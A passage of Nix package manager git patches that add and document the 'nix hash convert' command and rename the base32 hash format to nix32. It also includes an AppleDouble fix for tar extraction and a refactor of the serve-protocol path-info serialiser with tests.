"md5-uzQ4+6vUYOptvSfRU+IjOw==" "sha1-2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "sha1-zVToVowbN88eW62wd5vL84IhIYk=" "sha1-bRLhCx0zHa0hDkf9JdTyYIArfnc=" "sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "sha256-kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "sha256-rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "sha512-nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "sha512-IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; } +{ hashesBase16 = [ "d41d8cd98f00b204e9800998ecf8427e" "6c69ee7f211c640419d5366cc076ae46" "bb3438fbabd460ea6dbd27d153e2233b" "da39a3ee5e6b4b0d3255bfef95601890afd80709" "cd54e8568c1b37cf1e5badb0779bcbf382212189" "6d12e10b1d331dad210e47fd25d4f260802b7e77" "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" "900a4469df00ccbfd0c145c6d1e4b7953dd0afafadd7534e3a4019e8d38fc663" "ad0387b3bd8652f730ca46d25f9c170af0fd589f42e7f23f5a9e6412d97d7e56" "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e" "9d0886f8c6b389398a16257bc79780fab9831c7fc11c8ab07fa732cb7b348feade382f92617c9c5305fefba0af02ab5fd39a587d330997ff5bd0db19f7666653" "21644b72aa259e5a588cd3afbafb1d4310f4889680f6c83b9d531596a5a284f34dbebff409d23bcc86aee6bad10c891606f075c6f4755cb536da27db5693f3a7" ]; hashesBase32 = [ "3y8bwfr609h3lh9ch0izcqq7fl" "26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesBase64 = [ "1B2M2Y8AsgTpgAmY7PhCfg==" "bGnufyEcZAQZ1TZswHauRg==" "uzQ4+6vUYOptvSfRU+IjOw==" "2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "zVToVowbN88eW62wd5vL84IhIYk=" "bRLhCx0zHa0hDkf9JdTyYIArfnc=" "47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; hashesNix32 = [ "3y8bwfr609h3lh9ch0izcqq7fl" "26mrvc0v1nslch8r0w45zywsbc" "1v4gi57l97pmnylq6lmgxkhd5v" "143xibwh31h9bvxzalr0sjvbbvpa6ffs" "i4hj30pkrfdpgc5dbcgcydqviibfhm6d" "fxz2p030yba2bza71qhss79k3l5y24kd" "0mdqa9w1p6cmli6976v4wi0sw9r4p5prkj7lzfd1877wk11c9c73" "0qy6iz9yh6a079757mxdmypx0gcmnzjd3ij5q78bzk00vxll82lh" "0mkygpci4r4yb8zz5rs2kxcgvw0a2yf5zlj6r8qgfll6pnrqf0xd" "0zdl9zrg8r3i9c1g90lgg9ip5ijzv3yhz91i0zzn3r8ap9ws784gkp9dk9j3aglhgf1amqb0pj21mh7h1nxcl18akqvvf7ggqsy30yg" "19ncrpp37dx0nzzjw4k6zaqkb9mzaq2myhgpzh5aff7qqcj5wwdxslg6ixwncm7gyq8l761gwf87fgsh2bwfyr52s53k2dkqvw8c24x" "2kz74snvckxldmmbisz9ikmy031d28cs6xfdbl6rhxx42glpyz4vww4lajrc5akklxwixl0js4g84233pxvmbykiic5m7i5m9r4nr11" ]; hashesSRI = [ "md5-1B2M2Y8AsgTpgAmY7PhCfg==" "md5-bGnufyEcZAQZ1TZswHauRg==" "md5-uzQ4+6vUYOptvSfRU+IjOw==" "sha1-2jmj7l5rSw0yVb/vlWAYkK/YBwk=" "sha1-zVToVowbN88eW62wd5vL84IhIYk=" "sha1-bRLhCx0zHa0hDkf9JdTyYIArfnc=" "sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=" "sha256-kApEad8AzL/QwUXG0eS3lT3Qr6+t11NOOkAZ6NOPxmM=" "sha256-rQOHs72GUvcwykbSX5wXCvD9WJ9C5/I/Wp5kEtl9flY=" "sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==" "sha512-nQiG+MaziTmKFiV7x5eA+rmDHH/BHIqwf6cyy3s0j+reOC+SYXycUwX++6CvAqtf05pYfTMJl/9b0NsZ92ZmUw==" "sha512-IWRLcqolnlpYjNOvuvsdQxD0iJaA9sg7nVMVlqWihPNNvr/0CdI7zIau5rrRDIkWBvB1xvR1XLU22ifbVpPzpw==" ]; } diff --git a/tests/functional/lang/eval-okay-convertHash.nix b/tests/functional/lang/eval-okay-convertHash.nix index cf4909aaf..a0191ee8d 100644 --- a/tests/functional/lang/eval-okay-convertHash.nix +++ b/tests/functional/lang/eval-okay-convertHash.nix @@ -5,12 +5,14 @@ let map2' = f: fsts: snds: map2 f { inherit fsts snds; }; getOutputHashes = hashes: { hashesBase16 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base16";}) hashAlgos hashes; + hashesNix32 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";}) hashAlgos hashes; hashesBase32 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";}) hashAlgos hashes; hashesBase64 = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base64";}) hashAlgos hashes; hashesSRI = map2' (hashAlgo: hash: builtins.convertHash { inherit hash hashAlgo; toHashFormat = "sri" ;}) hashAlgos hashes; }; getOutputHashesColon = hashes: { hashesBase16 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base16";}) hashAlgos hashes; + hashesNix32 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "nix32";}) hashAlgos hashes; hashesBase32 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base32";}) hashAlgos hashes; hashesBase64 = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "base64";}) hashAlgos hashes; hashesSRI = map2' (hashAlgo: hashBody: builtins.convertHash { hash = hashAlgo + ":" + hashBody; toHashFormat = "sri" ;}) hashAlgos hashes; diff --git a/tests/unit/libutil/hash.cc b/tests/unit/libutil/hash.cc index 4d82c7f09..a88994d0b 100644 --- a/tests/unit/libutil/hash.cc +++ b/tests/unit/libutil/hash.cc @@ -80,7 +80,7 @@ namespace nix { * --------------------------------------------------------------------------*/ TEST(hashFormat, testRoundTripPrintParse) { - for (const HashFormat hashFormat: { HashFormat::Base64, HashFormat::Base32, HashFormat::Base16, HashFormat::SRI}) { + for (const HashFormat hashFormat: { HashFormat::Base64, HashFormat::Nix32, HashFormat::Base16, HashFormat::SRI}) { ASSERT_EQ(parseHashFormat(printHashFormat(hashFormat)), hashFormat); ASSERT_EQ(*parseHashFormatOpt(printHashFormat(hashFormat)), hashFormat); } From 7ff876b92b590fd9559472935f4adce1d3d5efb7 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 15:58:04 +0100 Subject: [PATCH 062/654] Add deprecation notice for old nix hash conversion subcommands. (But not yet nix-hash since `nix hash` is still hidden behind a feature flag.) https://github.com/NixOS/nix/issues/8876 --- src/nix/hash.cc | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/src/nix/hash.cc b/src/nix/hash.cc index f9c7592a3..2c9deb0d5 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -127,6 +127,7 @@ struct CmdToBase : Command void run() override { + warn("The old format conversion sub commands of `nix hash` where deprecated in favor of `nix hash convert`."); for (auto s : args) logger->cout(Hash::parseAny(s, ht).to_string(hashFormat, hashFormat == HashFormat::SRI)); } @@ -208,6 +209,9 @@ static auto rCmdHash = registerCommand("hash"); /* Legacy nix-hash command. */ static int compatNixHash(int argc, char * * argv) { + // Wait until `nix hash convert` is not hidden behind experimental flags anymore. + // warn("`nix-hash` has been deprecated in favor of `nix hash convert`."); + std::optional ha; bool flat = false; HashFormat hashFormat = HashFormat::Base16; From 8afeaf05c4063d48e65d2d82c31c3323c3237f7c Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Tue, 28 Nov 2023 19:02:15 +0100 Subject: [PATCH 063/654] Add docs/rl-notes for `nix hash convert` / `builtins.convertHash` https://github.com/NixOS/nix/issues/8876 --- doc/manual/rl-next/hash-format-nix32.md | 22 ++++++++++++ doc/manual/rl-next/nix-hash-convert.md | 47 +++++++++++++++++++++++++ src/libexpr/primops.cc | 8 ++--- src/nix/hash.cc | 2 +- 4 files changed, 74 insertions(+), 5 deletions(-) create mode 100644 doc/manual/rl-next/hash-format-nix32.md create mode 100644 doc/manual/rl-next/nix-hash-convert.md diff --git a/doc/manual/rl-next/hash-format-nix32.md b/doc/manual/rl-next/hash-format-nix32.md new file mode 100644 index 000000000..20c557da9 --- /dev/null +++ b/doc/manual/rl-next/hash-format-nix32.md @@ -0,0 +1,22 @@ +synopsis: Rename hash format `base32` to `nix32` +prs: #9452 +description: { + +Hash format `base32` was renamed to `nix32` since it used a special nix-specific character set for +[Base32](https://en.wikipedia.org/wiki/Base32). + +## Deprecation: Use `nix32` instead of `base32` as `toHashFormat` + +For the builtin `convertHash`, the `toHashFormat` parameter now accepts the same hash formats as the `--to`/`--from` +parameters of the `nix hash conert` command: `"base16"`, `"nix32"`, `"base64"`, and `"sri"`. The former `"base32"` value +remains as a deprecated alias for `"base32"`. Please convert your code from: + +```nix +builtins.convertHash { inherit hash hashAlgo; toHashFormat = "base32";} +``` + +to + +```nix +builtins.convertHash { inherit hash hashAlgo; toHashFormat = "nix32";} +``` \ No newline at end of file diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md new file mode 100644 index 000000000..de4367c5b --- /dev/null +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -0,0 +1,47 @@ +synopsis: Add `nix hash convert` +prs: #9452 +description: { + +New [`nix hash convert`](https://github.com/NixOS/nix/issues/8876) sub command with a fast track +to stabilization! Examples: + +- Convert the hash to `nix32`. + + ```bash + $ nix hash convert --algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + vw46m23bizj4n8afrc0fj19wrp7mj3c0 + ``` + `nix32` is a base32 encoding with a nix-specific character set. + Explicitly specify the hashing algorithm (optional with SRI hashes) but detect hash format by the length of the input + hash. +- Convert the hash to the `sri` format that includes an algorithm specification: + ```bash + nix hash convert --algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` + or with an explicit `-to` format: + ```bash + nix hash convert --algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + sha1-gA1Zz808BekAy04hS+SPa4hqCN8= + ``` +- Assert the input format of the hash: + ```bash + nix hash convert --algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' + nix hash convert --algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= + ``` + +The `--to`/`--from`/`--algo` parameters have context-sensitive auto-completion. + +## Related Deprecations + +The following commands are still available but will emit a deprecation warning. Please convert your code to +`nix hash convert`: + +- `nix hash to-base16 $hash1 $hash2`: Use `nix hash convert --to base16 $hash1 $hash2` instead. +- `nix hash to-base32 $hash1 $hash2`: Use `nix hash convert --to nix32 $hash1 $hash2` instead. +- `nix hash to-base64 $hash1 $hash2`: Use `nix hash convert --to base64 $hash1 $hash2` instead. +- `nix hash to-sri $hash1 $hash2`: : Use `nix hash convert --to sri $hash1 $hash2` + or even just `nix hash convert $hash1 $hash2` instead. +} diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 7831f3803..4162a8da3 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -1339,7 +1339,7 @@ drvName, Bindings * attrs, Value & v) .errPos = state.positions[noPos] }); - auto ht = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); + auto ha = parseHashAlgoOpt(outputHashAlgo).value_or(HashAlgorithm::SHA256); auto method = ingestionMethod.value_or(FileIngestionMethod::Recursive); for (auto & i : outputs) { @@ -1348,13 +1348,13 @@ drvName, Bindings * attrs, Value & v) drv.outputs.insert_or_assign(i, DerivationOutput::Impure { .method = method, - .hashAlgo = ht, + .hashAlgo = ha, }); else drv.outputs.insert_or_assign(i, DerivationOutput::CAFloating { .method = method, - .hashAlgo = ht, + .hashAlgo = ha, }); } } @@ -3837,7 +3837,7 @@ static RegisterPrimOp primop_convertHash({ The format of the resulting hash. Must be one of - `"base16"` - - `"base32"` + - `"nix32"` - `"base64"` - `"sri"` diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 2c9deb0d5..0bba3b7d2 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -118,7 +118,7 @@ struct CmdToBase : Command std::string description() override { - return fmt("convert a hash to %s representation", + return fmt("convert a hash to %s representation (deprecated, use `nix hash convert` instead)", hashFormat == HashFormat::Base16 ? "base-16" : hashFormat == HashFormat::Nix32 ? "base-32" : hashFormat == HashFormat::Base64 ? "base-64" : From d38ec1285573c98c987ec1421f7cec68754204f9 Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 11:53:50 +0100 Subject: [PATCH 064/654] Update src/libexpr/primops.cc MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com> --- src/libexpr/primops.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 4162a8da3..828d118eb 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -3838,6 +3838,7 @@ static RegisterPrimOp primop_convertHash({ The format of the resulting hash. Must be one of - `"base16"` - `"nix32"` + - `"base32"` (deprecated alias for `"nix32"`) - `"base64"` - `"sri"` From bbba2055f0b77e9677ef318ceea3084906eccd7d Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 16:43:52 +0100 Subject: [PATCH 065/654] Refactor concurrently added tests to use HashAlgorithm. https://github.com/NixOS/nix/issues/8876 --- tests/unit/libutil-support/tests/hash.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/unit/libutil-support/tests/hash.cc b/tests/unit/libutil-support/tests/hash.cc index 577e9890e..50889cd33 100644 --- a/tests/unit/libutil-support/tests/hash.cc +++ b/tests/unit/libutil-support/tests/hash.cc @@ -11,7 +11,7 @@ using namespace nix; Gen Arbitrary::arbitrary() { - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); for (size_t i = 0; i < hash.hashSize; ++i) hash.hash[i] = *gen::arbitrary(); return gen::just(hash); From e9a5365db66737d1438fd91eba6529d278e1efca Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sat, 2 Dec 2023 18:19:51 +0100 Subject: [PATCH 066/654] hash.sh: Make failure tests more tolerant of additional output "warning: you don'\''t have Internet access; disabling some network-dependent features" ... https://github.com/NixOS/nix/issues/8876 --- tests/functional/hash.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 278ed83b9..47eed5178 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -173,11 +173,11 @@ try3() { # fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") - [[ "$fail" == "error: input hash"*"exit: 1" ]] + [[ "$fail" == *"error: input hash"*"exit: 1" ]] } From 9a1a3c43bf11912ad32c433219c4c21a1b6ca9dd Mon Sep 17 00:00:00 2001 From: Peter Kolloch Date: Sun, 3 Dec 2023 09:50:44 +0100 Subject: [PATCH 067/654] Store.xs: fix references to HashFormat::Nix32 https://github.com/NixOS/nix/issues/8876 --- perl/lib/Nix/Store.xs | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 50148141b..82c7db608 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -78,7 +78,7 @@ SV * queryReferences(char * path) SV * queryPathHash(char * path) PPCODE: try { - auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Base32, true); + auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -104,7 +104,7 @@ SV * queryPathInfo(char * path, int base32) XPUSHs(&PL_sv_undef); else XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); - auto s = info->narHash.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, true); + auto s = info->narHash.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); mXPUSHi(info->registrationTime); mXPUSHi(info->narSize); @@ -206,7 +206,7 @@ SV * hashPath(char * algo, int base32, char * path) PPCODE: try { Hash h = hashPath(parseHashAlgo(algo), path).first; - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -217,7 +217,7 @@ SV * hashFile(char * algo, int base32, char * path) PPCODE: try { Hash h = hashFile(parseHashAlgo(algo), path); - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -228,7 +228,7 @@ SV * hashString(char * algo, int base32, char * s) PPCODE: try { Hash h = hashString(parseHashAlgo(algo), s); - auto s = h.to_string(base32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); @@ -239,7 +239,7 @@ SV * convertHash(char * algo, char * s, int toBase32) PPCODE: try { auto h = Hash::parseAny(s, parseHashAlgo(algo)); - auto s = h.to_string(toBase32 ? HashFormat::Base32 : HashFormat::Base16, false); + auto s = h.to_string(toBase32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); From bf00d5ecef20c11eb7e49dff3482b9e536cf7abe Mon Sep 17 00:00:00 2001 From: Bryan Honof Date: Thu, 7 Dec 2023 11:04:48 +0100 Subject: [PATCH 068/654] fix(libutil/tarfile): add option to libarchive so it behaves correctly with AppleDouble files AppleDouble files were extracted differently on macOS machines than on other UNIX's. Setting `archive_read_set_format_option(this->archive, NULL ,"mac-ext",NULL)` fixes this problem, since it just ignores the AppleDouble file and treats it as a normal one. This was a problem since it caused source archives to be different between macOS and Linux. Ref: nixos/nix#9290 --- src/libutil/tarfile.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/libutil/tarfile.cc b/src/libutil/tarfile.cc index 1733c791c..187b3e948 100644 --- a/src/libutil/tarfile.cc +++ b/src/libutil/tarfile.cc @@ -53,6 +53,7 @@ TarArchive::TarArchive(Source & source, bool raw) : buffer(65536) archive_read_support_format_raw(archive); archive_read_support_format_empty(archive); } + archive_read_set_option(archive, NULL, "mac-ext", NULL); check(archive_read_open(archive, (void *)this, callback_open, callback_read, callback_close), "Failed to open archive (%s)"); } @@ -63,6 +64,7 @@ TarArchive::TarArchive(const Path & path) archive_read_support_filter_all(archive); archive_read_support_format_all(archive); + archive_read_set_option(archive, NULL, "mac-ext", NULL); check(archive_read_open_filename(archive, path.c_str(), 16384), "failed to open archive: %s"); } From a5521b7d9445af63a159d4fe7b44a0902c3a2a24 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 7 Dec 2023 10:49:29 -0500 Subject: [PATCH 069/654] Factor out `ServeProto::Serialiser` and test In the process, partially undo e89b5bd0bfeb4dfdd8fe7e6929544cb9ceb8a505 in that the ancient < 2.4 version is now supported again by the serializer again. `LegacySSHStore`, instead of also asserting that the version is at least 4, just checks that `narHash` is set. This allows us to better test the serializer in isolation for both versions (< 4 and >= 4). --- src/libstore/legacy-ssh-store.cc | 22 ++--- src/libstore/serve-protocol.cc | 44 ++++++++++ src/libstore/serve-protocol.hh | 3 + src/nix-store/nix-store.cc | 12 +-- .../unkeyed-valid-path-info-2.3.bin | Bin 0 -> 184 bytes .../unkeyed-valid-path-info-2.4.bin | Bin 0 -> 648 bytes tests/unit/libstore/serve-protocol.cc | 77 ++++++++++++++++++ 7 files changed, 131 insertions(+), 27 deletions(-) create mode 100644 tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin create mode 100644 tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.4.bin diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index fb1580dd6..277445ee6 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -172,24 +172,12 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor if (p.empty()) return callback(nullptr); auto path2 = parseStorePath(p); assert(path == path2); - /* Hash will be set below. FIXME construct ValidPathInfo at end. */ - auto info = std::make_shared(path, Hash::dummy); + auto info = std::make_shared( + path, + ServeProto::Serialise::read(*this, *conn)); - auto deriver = readString(conn->from); - if (deriver != "") - info->deriver = parseStorePath(deriver); - info->references = ServeProto::Serialise::read(*this, *conn); - readLongLong(conn->from); // download size - info->narSize = readLongLong(conn->from); - - { - auto s = readString(conn->from); - if (s == "") - throw Error("NAR hash is now mandatory"); - info->narHash = Hash::parseAnyPrefixed(s); - } - info->ca = ContentAddress::parseOpt(readString(conn->from)); - info->sigs = readStrings(conn->from); + if (info->narHash == Hash::dummy) + throw Error("NAR hash is now mandatory"); auto s = readString(conn->from); assert(s == ""); diff --git a/src/libstore/serve-protocol.cc b/src/libstore/serve-protocol.cc index fb33553c5..c37b3095c 100644 --- a/src/libstore/serve-protocol.cc +++ b/src/libstore/serve-protocol.cc @@ -5,6 +5,7 @@ #include "serve-protocol.hh" #include "serve-protocol-impl.hh" #include "archive.hh" +#include "path-info.hh" #include @@ -54,4 +55,47 @@ void ServeProto::Serialise::write(const StoreDirConfig & store, Ser } } + +UnkeyedValidPathInfo ServeProto::Serialise::read(const StoreDirConfig & store, ReadConn conn) +{ + /* Hash should be set below unless very old `nix-store --serve`. + Caller should assert that it did set it. */ + UnkeyedValidPathInfo info { Hash::dummy }; + + auto deriver = readString(conn.from); + if (deriver != "") + info.deriver = store.parseStorePath(deriver); + info.references = ServeProto::Serialise::read(store, conn); + + readLongLong(conn.from); // download size, unused + info.narSize = readLongLong(conn.from); + + if (GET_PROTOCOL_MINOR(conn.version) >= 4) { + auto s = readString(conn.from); + if (!s.empty()) + info.narHash = Hash::parseAnyPrefixed(s); + info.ca = ContentAddress::parseOpt(readString(conn.from)); + info.sigs = readStrings(conn.from); + } + + return info; +} + +void ServeProto::Serialise::write(const StoreDirConfig & store, WriteConn conn, const UnkeyedValidPathInfo & info) +{ + conn.to + << (info.deriver ? store.printStorePath(*info.deriver) : ""); + + ServeProto::write(store, conn, info.references); + // !!! Maybe we want compression? + conn.to + << info.narSize // downloadSize, lie a little + << info.narSize; + if (GET_PROTOCOL_MINOR(conn.version) >= 4) + conn.to + << info.narHash.to_string(HashFormat::Nix32, true) + << renderContentAddress(info.ca) + << info.sigs; +} + } diff --git a/src/libstore/serve-protocol.hh b/src/libstore/serve-protocol.hh index 6e9d66e2d..ada67a149 100644 --- a/src/libstore/serve-protocol.hh +++ b/src/libstore/serve-protocol.hh @@ -18,6 +18,7 @@ struct Source; // items being serialised struct BuildResult; +struct UnkeyedValidPathInfo; /** @@ -141,6 +142,8 @@ inline std::ostream & operator << (std::ostream & s, ServeProto::Command op) template<> DECLARE_SERVE_SERIALISER(BuildResult); +template<> +DECLARE_SERVE_SERIALISER(UnkeyedValidPathInfo); template DECLARE_SERVE_SERIALISER(std::vector); diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index db45be2a8..45af7879c 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -891,16 +891,8 @@ static void opServe(Strings opFlags, Strings opArgs) for (auto & i : paths) { try { auto info = store->queryPathInfo(i); - out << store->printStorePath(info->path) - << (info->deriver ? store->printStorePath(*info->deriver) : ""); - ServeProto::write(*store, wconn, info->references); - // !!! Maybe we want compression? - out << info->narSize // downloadSize - << info->narSize; - if (GET_PROTOCOL_MINOR(clientVersion) >= 4) - out << info->narHash.to_string(HashFormat::Nix32, true) - << renderContentAddress(info->ca) - << info->sigs; + out << store->printStorePath(info->path); + ServeProto::write(*store, wconn, static_cast(*info)); } catch (InvalidPath &) { } } diff --git a/tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin b/tests/unit/libstore/data/serve-protocol/unkeyed-valid-path-info-2.3.bin new file mode 100644 index 0000000000000000000000000000000000000000..8056ec055ed2039814ab2654aad984f07115518f GIT binary patch literal 184 zcmZQzKm~Rk5I&4HhDz(_Wmf1Hm*f|v>Zco)n`cxS7viFIlM;*cQi{sJIvJt*ahg+E XS&435ArJt~*Gcp=fmdD+P%du3+9=$K@X zTQa|lwn`cL3n8wg;O8!IE8WDiY-4aNzU{MP{{~7(rMCb8 literal 0 HcmV?d00001 diff --git a/tests/unit/libstore/serve-protocol.cc b/tests/unit/libstore/serve-protocol.cc index 6d2054f7d..c2298c6db 100644 --- a/tests/unit/libstore/serve-protocol.cc +++ b/tests/unit/libstore/serve-protocol.cc @@ -225,6 +225,83 @@ VERSIONED_CHARACTERIZATION_TEST( t; })) +VERSIONED_CHARACTERIZATION_TEST( + ServeProtoTest, + unkeyedValidPathInfo_2_3, + "unkeyed-valid-path-info-2.3", + 2 << 8 | 3, + (std::tuple { + ({ + UnkeyedValidPathInfo info { Hash::dummy }; + info.narSize = 34878; + info; + }), + ({ + UnkeyedValidPathInfo info { Hash::dummy }; + info.deriver = StorePath { + "g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar.drv", + }; + info.references = { + StorePath { + 